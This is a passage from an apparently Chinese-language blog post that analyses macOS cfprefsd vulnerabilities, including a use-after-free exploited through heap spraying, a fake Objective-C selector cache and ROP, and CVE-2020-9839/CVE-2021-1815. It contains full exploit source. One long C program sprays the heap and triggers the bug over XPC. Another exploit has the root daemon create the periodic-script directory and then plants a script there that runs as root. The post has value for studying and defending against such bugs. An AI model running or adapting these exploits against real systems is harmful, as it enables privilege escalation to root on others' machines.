<p>接下来是要寻找一个合适的填充对象，该对象应该满足以下几点：</p>
<ol>
<li>可以控制前8个字节，允许控制ISA指针</li>
<li>对象的大小应该是0xc0——与释放的xpc_dictionary_t相同，更有可能填满释放的内存</li>
<li>应该可以控制内存分配，提高填充率</li>
</ol>
<p>这里选择的是OS_xpc_string，在反序列化 OS_xpc_string 时，函数 xpc_string_deserialize 调用 xpc_try_strdup（封装的strdup()函数）。通过控制字符串的长度，可以控制分配的大小。将多个 OS_xpc_string 对象添加到反序列化的字典或数组中也可能会增加填充率。长度为 0xc0 的字符串能达到超过 60% 的填充释放对象的成功率。</p>
<h4 id="控制PC"><a href="#控制PC" class="headerlink" title="控制PC"></a>控制PC</h4><p>Object-C 对象的前 8 个字节是 ISA 指针。将 ISA 指针指向一个受控的内存空间可以让我们控制 Object-C 的方法调用，这里可以参考<a target="_blank" rel="noopener" href="http://phrack.org/issues/69/9.html#article">Modern Objective-C Exploitation Techniques</a>。</p>
<p>下一个问题是要解决ASLR，这里是通过堆喷来实现的，可以参考Ian Beer的<a target="_blank" rel="noopener" href="https://thecyberwire.com/events/docs/IanBeer_JSS_Slides.pdf">Auditing and Exploiting Apple IPC</a>。</p>
<p>堆喷的数据是在VM_ALLOCATE区域，可以在 0x180202000 可靠地找到。由于字符串截断机制，我们需要稍微移动数据，使用 0x180202020 而不是 0x180202000。如果我们使用 0x180202000，作为字符串的第一个字节的第一个空字节将终止字符串。</p>
<p>但是，控制PC以后的成功率反而降低了，从60%+ 下降到 5%-，原因是在64位中，0x180202020实际是0x0000000180202020，字符串将在第五个字节处截断，由于OS X使用基于大小的空闲列表来加速分配，字符串可能会分配到其他地方。</p>
<p>在控制PC之后，我们可以构造一个payload来做Return Oriented Programming，通过调用system()或者像Brandon的<a target="_blank" rel="noopener" href="https://bazad.github.io/2018/11/introduction-userspace-race-conditions-ios/">An introduction to exploiting userspace race conditions on iOS</a>那样获取cfprefsd的任务端口来执行任意命令。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;xpc/xpc.h&gt;</span><br><span class="line">#import &lt;pthread.h&gt;</span><br><span class="line">#include &lt;mach/mach.h&gt;</span><br><span class="line">#include &lt;mach/task.h&gt;</span><br><span class="line">#include &lt;dlfcn.h&gt;</span><br><span class="line">#include &lt;mach-o/dyld_images.h&gt;</span><br><span class="line">#include &lt;objc/runtime.h&gt;</span><br><span class="line"> </span><br><span class="line">#define AGENT 1</span><br><span class="line"> </span><br><span class="line">#define FILL_DICT_COUNT 0x600</span><br><span class="line">#define FILL_COUNT 0x1000</span><br><span class="line">#define FREE_COUNT 0x2000</span><br><span class="line">#define FILL_SIZE (0xc0)</span><br><span class="line"> </span><br><span class="line">int need_stop = 0;</span><br><span class="line"> </span><br><span class="line">struct heap_spray &#123;</span><br><span class="line">    void* fake_objc_class_ptr;</span><br><span class="line">    uint32_t r10;</span><br><span class="line">    uint32_t r4;</span><br><span class="line">    void* fake_sel_addr;</span><br><span class="line">    uint32_t r5;</span><br><span class="line">    uint32_t r6;</span><br><span class="line">    uint64_t cmd;</span><br><span class="line">    uint8_t pad1[0x3c];</span><br><span class="line">    uint32_t stack_pivot;</span><br><span class="line">    struct fake_objc_class_t &#123;</span><br><span class="line">        char pad[0x8];</span><br><span class="line">        void* cache_buckets_ptr;</span><br><span class="line">        uint32_t cache_bucket_mask;</span><br><span class="line">    &#125; fake_objc_class;</span><br><span class="line">    struct fake_cache_bucket_t &#123;</span><br><span class="line">        void* cached_sel;</span><br><span class="line">        void* cached_function;</span><br><span class="line">    &#125; fake_cache_bucket;</span><br><span class="line">    char command[32];</span><br><span class="line">&#125;;</span><br><span class="line"> </span><br><span class="line">void fill_once()&#123;</span><br><span class="line">   </span><br><span class="line">#if AGENT</span><br><span class="line">    xpc_connection_t client = xpc_connection_create_mach_service(&quot;com.apple.cfprefsd.agent&quot;,0,0);</span><br><span class="line">#else</span><br><span class="line">    xpc_connection_t client = xpc_connection_create_mach_service(&quot;com.apple.cfprefsd.daemon&quot;,0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);</span><br><span class="line">#endif</span><br><span class="line">   </span><br><span class="line">    xpc_connection_set_event_handler(client, ^void(xpc_object_t response) &#123;</span><br><span class="line">        xpc_type_t t = xpc_get_type(response);</span><br><span class="line">        if (t == XPC_TYPE_ERROR)&#123;</span><br><span class="line">            printf(&quot;err: %s\n&quot;, xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));</span><br><span class="line">            need_stop = 1 ;</span><br><span class="line">        &#125;</span><br><span class="line">        //printf(&quot;received an event\n&quot;);</span><br><span class="line">    &#125;);</span><br><span class="line">   </span><br><span class="line">    xpc_connection_resume(client);</span><br><span class="line">    xpc_object_t main_dict = xpc_dictionary_create(NULL, NULL, 0);</span><br><span class="line">   </span><br><span class="line">    xpc_object_t arr = xpc_array_create(NULL, 0);</span><br><span class="line">   </span><br><span class="line">    xpc_object_t spray_dict = xpc_dictionary_create(NULL, NULL, 0);</span><br><span class="line">    xpc_dictionary_set_int64(spray_dict, &quot;CFPreferencesOperation&quot;, 8);</span><br><span class="line">    xpc_dictionary_set_string(spray_dict, &quot;CFPreferencesDomain&quot;, &quot;xpc_str_domain&quot;);</span><br><span class="line">    xpc_dictionary_set_string(spray_dict, &quot;CFPreferencesUser&quot;, &quot;xpc_str_user&quot;);</span><br><span class="line">   </span><br><span class="line">    char key[100];</span><br><span class="line">    char value[FILL_SIZE];</span><br><span class="line">    memset(value, &quot;A&quot;, FILL_SIZE);</span><br><span class="line">    *((uint64_t *)value) = 0x4142010180202020;</span><br><span class="line">    //*((uint64_t *)value) = 0x180202020;</span><br><span class="line">    value[FILL_SIZE-1]=0;</span><br><span class="line">    for (int i=0; i&lt;FILL_DICT_COUNT; i++) &#123;</span><br><span class="line">        sprintf(key, &quot;%d&quot;,i);</span><br><span class="line">        xpc_dictionary_set_string(spray_dict, key, value);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    //NSLog(@&quot;%@&quot;, spray_dict);</span><br><span class="line">    for (uint64_t i=0; i&lt;FILL_COUNT; i++) &#123;</span><br><span class="line">        xpc_array_append_value(arr, spray_dict);</span><br><span class="line">    &#125;</span><br><span class="line">   </span><br><span class="line">    xpc_dictionary_set_int64(main_dict, &quot;CFPreferencesOperation&quot;, 5);</span><br><span class="line">   </span><br><span class="line">    xpc_dictionary_set_value(main_dict, &quot;CFPreferencesMessages&quot;, arr);</span><br><span class="line"> </span><br><span class="line">    void* heap_spray_target_addr = (void*)0x180202000;</span><br><span class="line">    struct heap_spray* map = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);</span><br><span class="line">    memset(map, 0, 0x1000);</span><br><span class="line">    struct heap_spray* hs = (struct heap_spray*)((uint64_t)map + 0x20);</span><br><span class="line">    //hs-&gt;null0 = 0;</span><br><span class="line">    hs-&gt;cmd = -1;</span><br><span class="line">    hs-&gt;fake_objc_class_ptr = &amp;hs-&gt;fake_objc_class;</span><br><span class="line">    hs-&gt;fake_objc_class.cache_buckets_ptr = &amp;hs-&gt;fake_cache_bucket;</span><br><span class="line">    hs-&gt;fake_objc_class.cache_bucket_mask = 0;</span><br><span class="line">    hs-&gt;fake_sel_addr = &amp;hs-&gt;fake_cache_bucket.cached_sel;</span><br><span class="line">    // nasty hack to find the correct selector address</span><br><span class="line">    hs-&gt;fake_cache_bucket.cached_sel = 0x7fff00000000 + (uint64_t)NSSelectorFromString(@&quot;dealloc&quot;);</span><br><span class="line">   </span><br><span class="line">    hs-&gt;fake_cache_bucket.cached_function = 0xdeadbeef;</span><br><span class="line">    size_t heap_spray_pages = 0x40000;</span><br><span class="line">    size_t heap_spray_bytes = heap_spray_pages * 0x1000;</span><br><span class="line">    char* heap_spray_copies = malloc(heap_spray_bytes);</span><br><span class="line">    for (int i = 0; i &lt; heap_spray_pages; i++)&#123;</span><br><span class="line">    memcpy(heap_spray_copies+(i*0x1000), map, 0x1000);</span><br><span class="line">    &#125;</span><br><span class="line">    xpc_dictionary_set_data(main_dict, &quot;heap_spray&quot;, heap_spray_copies, heap_spray_bytes);</span><br><span class="line"> </span><br><span class="line">    //NSLog(@&quot;%@&quot;, main_dict);</span><br><span class="line">    xpc_connection_send_message(client, main_dict);</span><br><span class="line">    printf(&quot;fill once\n&quot;);</span><br><span class="line">    xpc_release(main_dict);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">void trigger_vul()&#123;</span><br><span class="line">    #if AGENT</span><br><span class="line">        printf(&quot;AGENT\n&quot;);</span><br><span class="line">        xpc_connection_t conn = xpc_connection_create_mach_service(&quot;com.apple.cfprefsd.agent&quot;,0,0);</span><br><span class="line">    #else</span><br><span class="line">        printf(&quot;DAEMON\n&quot;);</span><br><span class="line">        xpc_connection_t conn = xpc_connection_create_mach_service(&quot;com.apple.cfprefsd.daemon&quot;,0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);</span><br><span class="line">    #endif</span><br><span class="line">        xpc_connection_set_event_handler(conn, ^(xpc_object_t response) &#123;</span><br><span class="line">            xpc_type_t t = xpc_get_type(response);</span><br><span class="line">            if (t == XPC_TYPE_ERROR)&#123;</span><br><span class="line">                printf(&quot;err: %s\n&quot;, xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));</span><br><span class="line">                need_stop = 1 ;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;);</span><br><span class="line">        xpc_connection_resume(conn);</span><br><span class="line">       </span><br><span class="line">        xpc_object_t hello = xpc_dictionary_create(NULL, NULL, 0);</span><br><span class="line">        xpc_object_t arr = xpc_array_create(NULL, 0);</span><br><span class="line">   </span><br><span class="line">        xpc_object_t arr_free = xpc_dictionary_create(NULL, NULL, 0);</span><br><span class="line">        xpc_dictionary_set_int64(arr_free, &quot;CFPreferencesOperation&quot;, 4);</span><br><span class="line">        xpc_array_append_value(arr, arr_free);</span><br><span class="line">        for (int i=0; i&lt;FREE_COUNT; i++) &#123;</span><br><span class="line">            xpc_object_t arr_elem1 = xpc_dictionary_create(NULL, NULL, 0);</span><br><span class="line">            xpc_dictionary_set_int64(arr_elem1, &quot;CFPreferencesOperation&quot;, 20);</span><br><span class="line">            xpc_array_append_value(arr, arr_elem1);</span><br><span class="line">        &#125;</span><br><span class="line">        //printf(&quot;%p, %p\n&quot;, arr_elem1, hello);</span><br><span class="line">        xpc_dictionary_set_int64(hello, &quot;CFPreferencesOperation&quot;, 5);</span><br><span class="line">        xpc_dictionary_set_value(hello, &quot;CFPreferencesMessages&quot;, arr);</span><br><span class="line"> </span><br><span class="line">        //NSLog (@&quot;%@&quot;, hello);</span><br><span class="line">        fill_once();</span><br><span class="line">        xpc_connection_send_message(conn, hello);</span><br><span class="line">        NSLog(@&quot; trigger vuln&quot;);</span><br><span class="line">        xpc_release(hello);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">int main(int argc, const char * argv[]) &#123;</span><br><span class="line"> </span><br><span class="line">    pthread_t fillthread1,triger_thread;</span><br><span class="line">    NSLog(@&quot;start to trigger..&quot;);</span><br><span class="line">    trigger_vul();</span><br><span class="line"> </span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="漏洞利用-PZ"><a href="#漏洞利用-PZ" class="headerlink" title="漏洞利用 - PZ"></a>漏洞利用 - PZ</h3><h4 id="思路-1"><a href="#思路-1" class="headerlink" title="思路"></a>思路</h4><p>还是在两次xpc_release中间，填充被释放的内存空间，通过并行运行的四个线程来实现，线程A、B和C启动并等待全局变量设置为1。当全局变量为1时，线程A、B和C分别尝试发送100次下面的XPC消息给服务：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 这不是一个有效的multiMessage</span></span><br><span class="line">&#123; <span class="string">&quot;CFPreferencesOperation&quot;</span>: 5,</span><br><span class="line">  <span class="string">&quot;CFPreferencesMessages&quot;</span> : [10<span class="string">&#x27;000 * xpc_data_spray] &#125;</span></span><br></pre></td></tr></table></figure>

<p>xpc_data_spray大小为448字节，目标地址是0x118080000。</p>
<h4 id="控制PC-1"><a href="#控制PC-1" class="headerlink" title="控制PC"></a>控制PC</h4><p>该漏洞将由子消息触发，其中操作键被映射到不会调用reply的处理程序。攻击者选择了操作4，由handleFlushSourceForDomainMessage处理。触发器消息如下所示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123; &quot;CFPreferencesOperation&quot;: 5</span><br><span class="line">  &quot;CFPreferencesMessages&quot; :</span><br><span class="line">    [</span><br><span class="line">      8000 * (op_1_dict, second_op_5_dict),</span><br><span class="line">      150 * (second_op_5_dict, op_4_dict, op_4_dict, op_4_dict),</span><br><span class="line">      third_op_5_dict</span><br><span class="line">    ]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>子消息如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">op_1_dict = &#123;</span><br><span class="line">  &quot;CFPreferencesOperation&quot;: 1,</span><br><span class="line">  &quot;domain&quot;: &quot;a&quot;,</span><br><span class="line">  &quot;A&quot;: 8_byte_xpc_data</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">second_op_5_dict = &#123;</span><br><span class="line">  &quot;CFPreferencesOperation&quot;: 5</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">op_4_dict = &#123;</span><br><span class="line">  &quot;CFPreferencesOperation&quot;: 4</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">third_op_5_dict = &#123;</span><br><span class="line">  &quot;CFPreferencesOperation&quot;: 5</span><br><span class="line">  &quot;CFPreferencesMessages&quot; : [0x2000 * xpc_send_right,</span><br><span class="line">                             0x10 * xpc_data_heapspray]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>上面的思路中说到，如果堆喷成功填充0x118080000处的内存的话，接下来就是调用xpc_release()函数，来进行释放。题外话，OC对象的第一个qword是它的isa指针，定义了对象的类型。xpc_release()函数会检查libxpc的__objc_data中是否有isa指针，如果存在，则调用os_object_release()函数；由于填充的0x118080000是一个虚假isa指针，因此会走另一条路，调用objc_release()函数。如果类对象的字段中的FAST_ALLOC位（偏移为0x20处字节的第2位）被清零，则释放选择器被发送到对象。</p>
<p>这种虚假选择器缓存技术可以参考<a target="_blank" rel="noopener" href="http://phrack.org/issues/69/9.html#article">Modern Objective-C Exploitation Techniques</a>。</p>
<p><img src="https://1.bp.blogspot.com/-47GnhJdhCx8/XWgi-xKfCOI/AAAAAAAANSU/7DRaHOJNZyomgFByAHrWqfsRbVgDA55kgCEwYBhgL/s1600/cfprefsd%2Bfake%2Bselector%2Bcache%2B-%2BHI_RES.png"></p>
<p>obj_msgSend负责处理选择器调用的本机函数。首先，obj_msgSend根绝isa指针，找到0x10处的(function_pointer, selector)对的数组，如果选择器与缓存中的条目匹配，就会调用缓存的函数指针。</p>
<p>控制PC后，接下来通过ROP，调用IOServiceMatching、IOServiceGetMatchingService和IOServiceOpen来获取一个IOKit UserClient mach端口发送权限。攻击者使用内存写入小工具将该端口名称写入他们连续发送的四个exfil消息。在WebContent进程中，在端口集上侦听消息。如果收到该消息，则会在其中发送一个ProvInfoIOKitUserClient。</p>
<p>ProvInfoIOKitUserClient将是另一个内核漏洞的故事了，有机会再说。</p>
<h2 id="CVE-2020-9839"><a href="#CVE-2020-9839" class="headerlink" title="CVE-2020-9839"></a>CVE-2020-9839</h2><h2 id="CVE-2021-1815"><a href="#CVE-2021-1815" class="headerlink" title="CVE-2021-1815"></a>CVE-2021-1815</h2><p>CVE-2020-9839的patch如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> _CFPrefsCreatePreferencesDirectory(path) &#123;</span><br><span class="line">    <span class="type">int</span> dirfd = open(<span class="string">&quot;/&quot;</span>, O_DIRECTORY);</span><br><span class="line">    <span class="keyword">for</span>(slice in path.split(<span class="string">&quot;/&quot;</span>)) &#123;</span><br><span class="line">        <span class="type">int</span> fd = openat(dirfd, slice, O_DIRECTORY);</span><br><span class="line">        <span class="keyword">if</span> (fd == <span class="number">-1</span> &amp;&amp; errno == ENOENT &amp;&amp; !mkdirat(dirfd, slice, perm)) &#123;</span><br><span class="line">            fd = openat(dirfd, slice, O_DIRECTORY|O_NOFOLLOW);</span><br><span class="line">            <span class="keyword">if</span> ( fd == <span class="number">-1</span> ) <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">            fchown(fd, uid, gid);</span><br><span class="line">        &#125;</span><br><span class="line">        &#125; <span class="comment">// close all fds return 0;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Apple 的修复确保不再遵循符号链接，因此无法再更改任意目录上的所有权。但该补丁不足以完全阻止权限提升。上面显示的代码仍然允许用户使用<strong>用户</strong>或<strong>root</strong>权限创建目录。由于目录位置在攻击者的控制之下，这可能会被滥用以将权限提升到 root。</p>
<p>macOS 使用维护脚本，即每天、每周和每月以 root 权限运行的定期脚本。周期性脚本通过**&#x2F;etc&#x2F;defaults&#x2F;periodic.conf**文件进行配置。此脚本也可以由用户定义：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 周期性脚本目录</span><br><span class="line">local_periodic=&quot;/usr/local/etc/periodic&quot;</span><br></pre></td></tr></table></figure>

<p>在默认 macOS 安装中，这个目录不存在。这意味着我们可以通过连接到<strong>cfprefsd</strong>守护程序服务并要求<strong>dameon</strong>将目录的所有权设置给我们的用户来创建此目录。创建此目录后，我们可以在那里创建我们的脚本（因为该位置将由用户拥有）并且该脚本将以 root 身份运行。</p>
<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// gcc -framework Foundation cfprefsd_exploit.m -o cfprefsd_exploit</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#import <span class="string">&lt;Foundation/Foundation.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;xpc/xpc.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="type">char</span> *serviceName = <span class="string">&quot;com.apple.cfprefsd.daemon&quot;</span>;</span><br><span class="line">    <span class="type">int</span> status = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="type">xpc_connection_t</span> conn;</span><br><span class="line">    <span class="type">xpc_object_t</span> msg;</span><br><span class="line"></span><br><span class="line">    conn = <span class="built_in">xpc_connection_create_mach_service</span>(serviceName, <span class="literal">NULL</span>, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);</span><br><span class="line">    <span class="keyword">if</span> (conn == <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;xpc_connection_create_mach_service&quot;</span>);    </span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">xpc_connection_set_event_handler</span>(conn, ^(<span class="type">xpc_object_t</span> obj) &#123;</span><br><span class="line">        <span class="built_in">perror</span>(<span class="string">&quot;xpc_connection_set_event_handler&quot;</span>);</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">xpc_connection_resume</span>(conn);</span><br><span class="line"></span><br><span class="line">    msg = <span class="built_in">xpc_dictionary_create</span>(<span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_int64</span>(msg, <span class="string">&quot;CFPreferencesOperation&quot;</span>, <span class="number">1</span>);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_bool</span>(msg, <span class="string">&quot;CFPreferencesUseCorrectOwner&quot;</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//create as user</span></span><br><span class="line">    <span class="built_in">xpc_dictionary_set_string</span>(msg, <span class="string">&quot;CFPreferencesUser&quot;</span>, <span class="string">&quot;kCFPreferencesCurrentUser&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">xpc_dictionary_set_string</span>(msg, <span class="string">&quot;CFPreferencesHostBundleIdentifier&quot;</span>, <span class="string">&quot;prefs&quot;</span>);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_string</span>(msg, <span class="string">&quot;CFPreferencesDomain&quot;</span>, <span class="string">&quot;/usr/local/etc/periodic/daily/a.plist&quot;</span>);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_string</span>(msg, <span class="string">&quot;Key&quot;</span>, <span class="string">&quot;key&quot;</span>);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_string</span>(msg, <span class="string">&quot;Value&quot;</span>, <span class="string">&quot;value&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">xpc_connection_send_message</span>(conn, msg);</span><br><span class="line">    <span class="built_in">usleep</span>(<span class="number">1000000</span>);</span><br><span class="line">   </span><br><span class="line">    NSString* script = @<span class="string">&quot;touch /Library/privesc.txt\n&quot;</span>;</span><br><span class="line">    NSError *error;</span><br><span class="line">    BOOL succeed = [script writeToFile:@<span class="string">&quot;/usr/local/etc/periodic/daily/111.lpe&quot;</span> atomically:YES encoding:NSUTF8StringEncoding error:&amp;error];</span><br><span class="line">    <span class="keyword">if</span> (!succeed)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Couldn&#x27;t create periodic script :(\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">   </span><br><span class="line">    <span class="type">char</span> mode[] = <span class="string">&quot;0777&quot;</span>;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    i = <span class="built_in">strtol</span>(mode, <span class="number">0</span>, <span class="number">8</span>);</span><br><span class="line">    <span class="built_in">chmod</span>(<span class="string">&quot;/usr/local/etc/periodic/daily/111.lpe&quot;</span>,i);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>此漏洞利用将向以 root<strong>身份</strong>运行的<strong>cfprefsd</strong>守护进程发起 XPC 消息。这由服务名称<strong>com.apple.cfprefsd.daemon</strong>标识（用户模式守护进程被标识为<strong>com.apple.cfprefsd.agent</strong>）。守护进程将创建文件夹**&#x2F;usr&#x2F;local&#x2F;etc&#x2F;periodic&#x2F;daily&#x2F;<strong>然后将我们的脚本写入该位置，该位置将运行</strong>touch &#x2F;Library&#x2F;privesc.txt**。</p>
<p>如果需要，我们还可以在漏洞利用中使用以下行以 root 身份创建一个目录。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xpc_dictionary_set_string(msg, &quot;CFPreferencesUser&quot;, &quot;root&quot;);</span><br></pre></td></tr></table></figure>

<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><p><a target="_blank" rel="noopener" href="https://gts3.org/assets/papers/2020/jin:pwn2own2020-safari-slides.pdf">Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ios/" rel="tag"># ios</a>
              <a href="/tags/macos/" rel="tag"># macos</a>
              <a href="/tags/cfprefsd/" rel="tag"># cfprefsd</a>
              <a href="/tags/logic-vul/" rel="tag"># logic vul</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/12/12/iOS-RCE-CVE-2019-8797-CVE-2019-8795-CVE-2019-8794/" rel="prev" title="iOS RCE: CVE-2019-8797,CVE-2019-8795,CVE-2019-8794">
